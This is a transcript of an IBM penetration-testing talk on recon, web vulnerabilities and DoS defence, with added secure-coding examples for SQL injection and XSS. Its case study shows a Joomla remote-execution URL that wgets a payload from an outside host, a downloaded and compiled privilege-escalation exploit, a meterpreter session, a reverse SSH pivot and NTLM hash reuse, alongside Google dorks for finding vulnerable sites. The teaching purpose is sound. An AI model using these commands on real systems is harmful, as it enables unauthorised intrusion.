Transcript of: Have a Smartphone? SCAN ME - GSE Young Professionals - Ethical Hacking and Pentesting (PDF)
Ethical Hacking and Pentesting
Vito Rallo, IBM Security Services, Penetration Testing
Have a Smartphone? SCAN ME
©2013 IBM Corporation
Hackers and Ethical Hackers
The hacker manifesto: “Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for.”
Having fun in Security
§ Ethical hackers enjoy the most exciting part of Security?
Network Security
Data Security
Application Security
Mobile Security
Cloud Security
Availability
Compliance
Management
TESTING
Penetration testing through the years
§ Early pentesting was a black art
§ True penetration testing skills were learned
§ There was no semblance of a commonly accepted methodology; every pentester used to write his own
§ In late 2000: the open source security testing methodology, the OSSTMM
§ Pentesting is now widespread, as are the tools and the knowledge
§ IBM has done pentesting since 1995
Outline of activities
§ The IBM penetration testing methodology includes:
– Project initiation
– Reconnaissance
– Discovery and assessment
– Perimeter or internal attack
– Exploitation
– Findings and analysis
– Deliverables (report)
Today: the new pentesting
A good pentest is made by PEOPLE, not by TOOLS
It is crucial to understand the process of an attack: not just the tools and the vulns, but the actual mindset needed to break in
Pentest is not a project, it is a PROCESS!
There are plenty of companies that will teach you “ethical hacking” and “applied pentesting”, plus books, tools and so on. None of them will give you the hacking mindset.
Client Values and Deliverables
Penetration testing services can deliver:
An effective, affordable service that provides a “hacker’s-eye” view of a client’s security posture
What IBM can deliver
Application Source Code Assessment (assessment of application vulnerabilities; leverages IBM Rational® AppScan® Source Edition)
§ In-depth assessment of vulnerabilities only found through source code analysis
§ Mapping to regulations such as PCI, DISA, FISMA and Sarbanes-Oxley, and to best practices including the OWASP Top 10
Application and Mobile Security Assessment (leverages IBM Rational® AppScan® software)
§ Functional review of the application from both a client and a server perspective
§ Comprehensive vulnerability assessment of the application and of the network infrastructure directly supporting it
§ Mobile applications assessment
Penetration testing
§ Corporate networks and local infrastructures (remote/onsite)
§ Web applications (black box/grey box)
§ Mobile and embedded device testing (e.g. iPhone, Android)
§ SCADA control systems for utility and power companies
§ Client-server apps and mobile apps
§ Reverse engineering and exploit development
DoS attack categories
§ Network (L4 attacks)
– TCP/UDP/ICMP floods
– Protocol-specific weaknesses
§ Application (L7 attacks)
– HTTP: Slowloris, R.U.D.Y., etc.
– SSL
– DNS
DDoS Defence Strategy
§ Many providers/services → cloud service
– Scrubbing services (clean pipe)
– MSS and carrier cloud NetFlow
§ Mostly based on anomaly analysis / signature-based detection
§ Common patterns: on-premises mitigation, off-premises mitigation
§ Pain point: decentralisation of the internet
§ Ideally, block attacks closest to the source
New generation remediation trends
§ Overlay networks
– Large distributed nodes, reverse proxies, bleeding-edge well-known mitigation services (Akamai)
Let’s get into the business: pentest in real life
Reconnaissance
§ DNS – Domain – IP → whois
§ Social networks
§ Corporate info and so on…
§ Job ads..!?
./theHarvester.py -d xxx.be -l 500 -b google
[-] Searching in Google:
Searching 500 results...
[+] Emails found:
------------------
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
…………..A LOT MORE
[+] Hosts found in search engines:
------------------------------------
1xx.244.74.x:www.xxx.be
1xx.244.x.200:ns.xxx.be
1xx.x.76.200:Ns.xxx.be
x.245.3.200:ns2.xxx.be
[-] Searching in Linkedin..
Users from Linkedin:
====================
Nico xxxff
Nishantxxxxar - Singapore Systems analyst web
Fraxx xxxens - Belgium
Lucxxx xxxans Systems technology analyst
xxx xxxeters
Nishant xxxxxxr
©2013 IBM Corporation
Reconnaissance
§ Google hacking.. and dorks
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()"
inurl:"id=" & intext:"Warning: mysql_fetch_array()"
inurl:":2082/login/?user="
inurl:free.fr/index.php?id=
inurl:reservation.php?id=
inurl:promotion.php?id=
inurl:carte.php?id=
inurl:menu.php?id=
Shodan
§ Google for hackers
§ Search engine of indexed “banners”
Tons and tons of open devices
Vulnerability Discovery
Latest 5 years tendency
Key issues in WebApp security
• SQL Injection – a definition:
“SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application (like queries). The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.”
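The definition above in working code, as an added example that is not part of the slides: the same login check written with a string-built query and with a parameterized one, against a constructed in-memory SQLite database. Only the second form keeps a quote inside the username from being read as SQL.

```python
import hashlib
import sqlite3


def digest(password: str) -> str:
    # Hashing is orthogonal to the injection: the flaw below is how the SQL is built.
    return hashlib.sha256(password.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    # Constructed demo database: one account, password stored as a hash.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT PRIMARY KEY, pw_hash TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("admin", digest("correct horse")))
    return conn


def login_vulnerable(conn: sqlite3.Connection, name: str, password: str) -> bool:
    # The user's text is spliced into the statement, so a quote in 'name' closes the
    # string literal early and the rest of the input is parsed as SQL grammar.
    query = f"SELECT name FROM users WHERE name = '{name}' AND pw_hash = '{digest(password)}'"
    return conn.execute(query).fetchone() is not None


def login_parameterized(conn: sqlite3.Connection, name: str, password: str) -> bool:
    # Placeholders: values travel separately from the statement text, so whatever
    # 'name' contains is compared as data and never parsed as SQL.
    query = "SELECT name FROM users WHERE name = ? AND pw_hash = ?"
    return conn.execute(query, (name, digest(password))).fetchone() is not None


def demo() -> dict:
    conn = make_db()
    # Constructed malformed username: a quote plus a comment marker, which in the
    # string-built query terminates the literal and comments out the password test.
    malformed = "admin' --"
    return {
        "valid_vuln": login_vulnerable(conn, "admin", "correct horse"),
        "valid_safe": login_parameterized(conn, "admin", "correct horse"),
        "malformed_vuln": login_vulnerable(conn, malformed, "wrong"),
        "malformed_safe": login_parameterized(conn, malformed, "wrong"),
    }


if __name__ == "__main__":
    print(demo())
```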
• Cross-Site Scripting – a definition:
“Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables attackers to inject client-side script into web pages viewed by other users.”
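To make the definition concrete, an added example (not from the slides) renders constructed user comments into a page twice: once by plain concatenation, once with contextual HTML escaping, and counts how many tags in the result did not come from the template itself. The attribute-context helper shows the second place where escaping must happen.

```python
import html
import re

# Constructed sample content stored by one user and shown to all others.
COMMENTS = [
    "Great talk!",
    '<img src=x onerror="alert(1)">',  # markup a browser would execute on load
]

# Tag openers that are not part of our own template (<ul>, <li>, <input>).
FOREIGN_TAG_RE = re.compile(r"<(?!/?(?:ul|li|input)\b)[a-zA-Z]")


def render_vulnerable(comments) -> str:
    # User text concatenated straight into HTML becomes live markup for every
    # visitor who loads the page: this is the stored variant of the bug.
    return "<ul>" + "".join(f"<li>{c}</li>" for c in comments) + "</ul>"


def render_escaped(comments) -> str:
    # html.escape() maps <, >, &, " and ' to entities, so the browser displays the
    # text literally instead of parsing it as an element.
    return "<ul>" + "".join(f"<li>{html.escape(c, quote=True)}</li>" for c in comments) + "</ul>"


def render_attribute_escaped(value: str) -> str:
    # Attribute context: the attribute must be quoted AND quotes inside the value
    # escaped, otherwise a value such as  x" onmouseover="...  breaks out of it.
    return f'<input name="q" value="{html.escape(value, quote=True)}">'


def foreign_tags(page: str) -> int:
    # Any tag opener not belonging to the template originated in user input.
    return len(FOREIGN_TAG_RE.findall(page))


if __name__ == "__main__":
    print(foreign_tags(render_vulnerable(COMMENTS)), foreign_tags(render_escaped(COMMENTS)))
    print(render_attribute_escaped('x" onmouseover="alert(1)'))
```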
SQL injection in Login
Cross-Site Scripting – The Exploit Process
XSS, BeEF
§ Basically a client-side exploitation framework
Establish a toehold
§ The beginning of the end
– Compromise a server: force the webapp to upload a malicious file → how? Discovered password, PHP include, PHP upload, exploiting CMS vulns and so on…
– Now, think about privilege escalation up to root!
French company, call it “Carla”
– Owns several brands
– Offers intranet services
– Hosts websites in an internal DMZ
§ Black box
– Pure offensive hacking, no whitelisting, event monitoring team
[Network diagram: servers (web, ftp) in DMZ 172.20.10.x behind one-to-one NAT/PAT; public hosts extranet.gammvert.fr, www.biotop.fr, www.invivo-group.com at 84.x.x.x, 84.x.x.y, 84.x.x.z]
Carla: critical vuln
§ Acajoom, plugin for Joomla (pass to exec)
http://X.X.33.4//components/com_acajoom/self.acajoom.php?s=system('wget%20http://x.x.x.x/myp.php')
Privilege escalation
Linux environment analysis (uname -a)
cat /etc/redhat-release
Red Hat Enterprise Linux Server release 5.3 (Tikanga)
cd /tmp
wget http://downloads.securityfocus.com/vulnerabilities/exploits/36038-6.c
gcc 36038-6.c -o nu
./nu
meterpreter > sysinfo
Computer    : XXXXwebServer
OS          : Linux XXXXwebServer 2.6.18-128.el5 #1 SMP Wed Dec 17 11:42:39 EST 2008 i686
Meterpreter : php/php
The final attack scenario
[Diagram: hacker’s attacking station → attacking server → reverse SSH tunnel → biotop web server (inVivo) in DMZ 172.20.10.x → server infrastructure (Windows and Linux hosts); labels: direct vuln exploitation, control + SOCKS VPN, reverse SSH]
Inside the DMZ
§ We can now connect over TCP to all the inner hosts on the private LAN: scan, discover, exploit again…
§ Touching services that are not available from outside the firewall (the firewall cannot catch me).
Windows domain escalation
§ Just an old unused server
§ Get in, compromise one
§ Get the NTLM hash for Admin, try it on another server..
– Administrators tend to use the same password for local admin accounts
§ Get another one, search for tokens…
– Service running with Domain Admin rights
§ Escalation to the domain controller!
The new unawareness: next years’ fun
Awareness and unawareness
§ Web app 5 years ago
– HTTP based, GET, POST requests
§ Web app today
– HTML, CSS, dynamic, AJAX, RoR…
– still some Flash, Java, Silverlight
§ Web app in 2 years
Web Apps in 2 years
Mobile Threat Model
Slide from OWASP
STRIDE Model for Mobile
Slide from OWASP
Testing framework for apps and devices
§ Dynamic analysis
§ Static analysis
Final considerations: security posture of your enterprise
Compliance is not total security
§ Scans, checklists, security products.. will they offer you a totally bullet-proof security solution?
The right attitude
§ Confused, uncertain, fearful, unprepared, proud, unclear…
Certainty
Uncertainty
§ Create security intelligence
§ Iterate Prevention → Monitor → Response to dynamically improve the security model
Emergency Response
§ Helps the customer under emergency contingency:
• Analysis of computer security incident data to determine the source of the incident, its cause and its effects;
• Assistance in preventing the effects of the computer security incident from spreading to other computer systems and networks;
• Assistance with stopping the computer security incident at its source and/or protecting the Customer’s computer systems and networks from its effects;
• Recommendations for restoring the affected computer systems and networks to normal operation; and
• Suggestions for protecting the Customer’s computer systems and networks from future similar occurrences
§ Incident response: containment and remediation (forensic analysis), prevention
§ Who they are: highly skilled security people, forensics experts, certified analysts and ex-military